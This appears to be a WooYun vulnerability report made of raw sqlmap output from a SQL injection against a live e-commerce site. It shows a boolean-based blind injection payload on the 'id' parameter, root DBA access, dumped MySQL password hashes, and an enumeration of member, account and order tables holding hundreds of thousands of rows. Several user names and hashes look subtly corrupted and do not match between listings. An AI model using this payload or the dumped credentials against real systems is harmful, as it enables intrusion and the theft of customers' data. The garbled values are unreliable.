WooYun.org

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: app=goods&id=10970 AND 5156=5156
---
web application technology: PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
current user:    'root@localhopt'
current user is DBA:    True
database management system users [3]:
[*] '`oot'@'localhost'
[*] 'qoot'@'**.**.**.**'
[*] 'root'@'127\x1c0.0.1'
database management system users password hashes:
[*] root [2]:
    password hash: *4D264C92FC0238@364FA71BE2B02E197D1F99B91
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1A
Database: aajflm
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| ecm_jflog               | 683675  |
| ecm_shop_member         | 614218  |
| ecm_spreader_member     | 508214  |
| ecm_member              | 505737  |
| ecm_member_account      | 505560  |
| ecm_jflog2              | 440930  |
| ecm_member1             | 403599  |
| ecm_jflog_copy          | 225399  |
| ecm_zsjflog_copy        | 216122  |
| ecm_uploaded_file       | 47374   |
| ecm_cart                | 22750   |
| ecm_sessions_data       | 21511   |
| ecm_lottery             | 21318   |
| ecm_goods_order_1023    | 19449   |
| ecm_goods_order_1030    | 19395   |
| ecm_category_goods      | 18263   |
| ecm_goods_spec          | 17196   |
| ecm_goods_image         | 16548   |
| ecm_incomeshop          | 13301   |
| ecm_order_goods         | 12627   |
| ecm_goods_statistics    | 12463   |
| ecm_goods               | 12448   |
| ecm_order_log           | 12356   |
| ecm_incomelog           | 12082   |
| ecm_goods_order_ls      | 11635   |
| ecm_order_extm          | 10816   |
| ecm_poss                | 5428    |
| ecm_comment             | 4772    |
| ecm_address             | 4002    |
| ecm_region_old          | 3452    |
| ecm_region              | 3413    |
| ecm_poslog              | 3394    |
| ecm_region_line         | 3384    |
| ecm_myarea              | 3142    |
| ecm_financial           | 2909    |
| sj_member               | 2836    |
| ecm_goods_spec_images   | 2817    |
| ecm_message             | 2750    |
| ecm_shop_copy           | 2304    |
| ecm_gcategory           | 1853    |
| ecm_collect             | 1554    |
| ecm_cflog               | 1358    |
| ecm_shop_10yuan         | 1318    |
| ecm_user_cf             | 818     |
| ecm_goods_adv           | 807     |
| ecm_posmember           | 661     |
| ecm_region_bak          | 475     |
| ecm_jfrestrictlog       | 351     |
| ecm_proposal            | 312     |
| ecm_shop_bak            | 244     |
| ecm_recommended_goods   | 143     |
| ecm_ka_cart             | 114     |
| ecm_goods_qa            | 95      |
| ecm_user_priv           | 69      |
| ecm_shop_ka             | 67      |
| ecm_ka_order            | 66      |
| ecm_goods_cart          | 56      |
| ecm_category_store      | 53      |
| ecm_sales               | 52      |
| ecm_store               | 52      |
| ecm_jflog_bak           | 42      |
| ecm_spreader_member_bak | 40      |
| ecm_myprovince          | 34      |
| ecm_postal              | 34      |
| ecm_ukinds              | 28      |
| sj_level                | 14      |
| ecm_scategory           | 6       |
| ecm_withdrawals         | 6       |
| ecm_exchange            | 3       |
| ecm_recommend           | 3       |
| ecm_scope               | 2       |
| ecm_bankcard_record     | 1       |
| ecm_pos_shop            | 1       |
+-------------------------+---------+
Database: mysql
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| help_relation           | 1009    |
| help_topic              | 510     |
| help_keyword            | 453     |
| `user`                  | 3       |
+-------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: aajflm
Table: ecm_member
[2 columns]
+-----------+
| Column    |
+-----------+
| password  |
| tpassword |
+-----------+
Database: aajflm
Table: ecm_member1
[2 columns]
+-----------+
| Column    |
+-----------+
| password  |
| tpassword |
+-----------+
Database: mysql
Table: user
[1 column]
+----------+
| Column   |
+----------+
| Password |
+----------+
Database: mysql
Table: user
[3 entries]
+--------------------------------------------------+
| Password                                         |
+--------------------------------------------------+
| *4D064C92FC0238F364FA71BE2B02E197D1F99B91        |
| *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B (root) |
| *81F5E21E35407D883A6CD4A731AE@FB6AF209E1B        |
+--------------------------------------------------+